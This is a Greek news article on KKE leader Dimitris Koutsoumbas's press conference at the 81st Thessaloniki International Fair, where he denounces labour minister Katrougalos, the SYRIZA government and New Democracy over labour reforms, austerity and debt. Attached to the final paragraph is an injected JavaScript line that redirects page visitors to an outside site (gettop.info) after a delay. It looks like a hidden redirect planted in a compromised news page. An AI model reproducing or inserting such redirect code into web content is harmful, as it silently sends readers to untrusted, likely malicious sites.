Κουτσούμπας στη ΔΕΘ: Δήμιος των εργασιακών δικαιωμάτων ο Kατρούγκαλος

0
5

 

Στη συνέντευξη Τύπου που έδωσε, στο πλαίσιο της 81ης ΔΕΘ ο γενικός γραμματέας του ΚΚΕ, Δημήτρης Κουτσούμπας χαρακτήρισε «δήμιο των εργασιακών δικαιωμάτων» τον υπουργό Εργασίας, Γιώργο Κατρούγκαλο, ενώ σημείωσε ότι τα σχέδια της κυβέρνησης για τις αλλαγές στα εργασιακά είναι «αιτία πολέμου».

«Η κυβέρνηση ετοιμάζεται για το νέο αποφασιστικό χτύπημα των εργασιακών δικαιωμάτων των εργαζομένων, απαγορεύοντας ντε φάκτο απεργίες, την πάλη των εργαζομένων, απελευθερώνοντας τις ομαδικές απολύσεις» είπε συγκεκριμένα και πρόσθεσε: «Όσο κι αν προσπαθεί να κρυφτεί πίσω από το ευρωπαϊκό κεκτημένο, ο Αλέξης Τσίπρας και ο δήμιος -να τον ονομάσω έτσι- των εργασιακών δικαιωμάτων Κατρούγκαλος, η κοινή στάση του Συνδέσμου Ελλήνων Βιομηχάνων και της κυβέρνησης είναι ξεκάθαρη. Προσπαθούν να ξεδοντιάσουν πραγματικά το εργατικό, συνδικαλιστικό κίνημα, να αφήσουν τους εργαζόμενους χωρίς κανένα όπλο στην πάλη τους απέναντι σε αυτή την επίθεση. Τα σχέδια αυτά πρέπει να συναντήσουν ισχυρές αντιστάσεις, είναι αιτία πολέμου».

Ο κ. Κουτσούμπας κατηγόρησε την κυβέρνηση ότι «προωθεί νέα αφαίμαξη, με φόρους, με περικοπές δαπανών, επιπρόσθετα 2 δισ. Ευρώ το 2017 και άλλα επιπρόσθετα 3,5 δισ. ευρώ το 2018, ενώ σχετικά με το χρέος, είπε ότι ο πρωθυπουργός «αποδέχεται να το πληρώσει στο ακέραιο ο ελληνικός λαός».

Για τη Νέα Δημοκρατία ανέφερε ότι «με λύπη και με πολιτική αμηχανία παρακολουθεί και βλέπει τον ΣΕΒ, τους θεσμούς της Ευρώπης και τους υπερατλαντικούς, να επικροτούν την κυβέρνηση του ΣΥΡΙΖΑ, σήμερα που κάνει πιο αποτελεσματικά από τις προηγούμενες δικές της κυβερνήσεις, για λογαριασμό του συστήματος. Η ΝΔ προβάλλει τη δική της αντιλαϊκή πρόταση, αφού με τον τίτλο ?λιγότεροι φόροι? απευθύνεται κυρίως στο μεγάλο κεφάλαιο, σε αυτούς λέει ότι θα βάλει λιγότερους φόρους. Και λέγοντας λιγότερες κρατικές δαπάνες, εννοεί το πετσόκομμα, κυρίως όσων κρατικών κονδυλίων έχουν ακόμα απομείνει -και δεν έχουν μείνει και πάρα πολλά- για τις λαϊκές, για τις κοινωνικές ανάγκες».

Ο γενικός γραμματέας του ΚΚΕ μίλησε για «κάλπικη πολιτική αντιπαράθεση ανάμεσα στον ΣΥΡΙΖΑ και τη Νέα Δημοκρατία, που εστιάζεται μόνο σε κάποια θέματα διαφθοράς, στην αναποτελεσματικότητα της διοίκησης, της διαχείρισης».

Όπως είπε, η ΝΔ και τα άλλα αστικά κόμματα δίνουν «πάτημα» στην κυβέρνηση να εγκλωβίζει ένα κόσμο. Κόμματα που λένε ότι κινούνται στον χώρο της Αριστεράς, καλλιεργούν αυταπάτες και λένε στον κόσμο να περιμένει «μήπως κάνει κάτι καλό το παιδί εκεί πάνω (σσ ο Αλέξης Τσίπρας)». Γι’ αυτό ο κ. Κουτσούμπας κάλεσε τους εργαζόμενους που είδαν τι σημαίνει «πρώτη φορά Αριστερά» να κλείσουν τα αυτιά στις σειρήνες που λένε ότι «σιγά- σιγά θα βγούμε από το τούνελ».

Σε ερώτηση για τις σχέσεις του ΚΚΕ με τον ΣΥΡΙΖΑ απάντησε ότι δεν υπάρχει κοινός τόπος και το κόμμα ψήφισε στη Βουλή διατάξεις που φέρνουν έστω και μικρή ανακούφιση στον λαό.

Για το θέμα που δημιουργήθηκε στο Ωραιόκαστρο Θεσσαλονίκης ο κ. Κουτσούμπας χαρακτήρισε «απαράδεκτα αυτά τα φαινόμενα που πρέπει να καταδικαστούν από όλους» και επέρριψε ευθύνες και στην κυβέρνηση για τον τρόπο με τον οποίο αντιμετωπίζει αυτά τα φαινόμενα και αν λαμβάνει υπόψη τις προτάσεις των κομμάτων. Ο ίδιος είπε ότι μπορούν να γίνονται μαθήματα για τα προσφυγόπουλα μέσα στα κέντρα φιλοξενίας και σε κοντινά σχολεία τα απογεύματα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here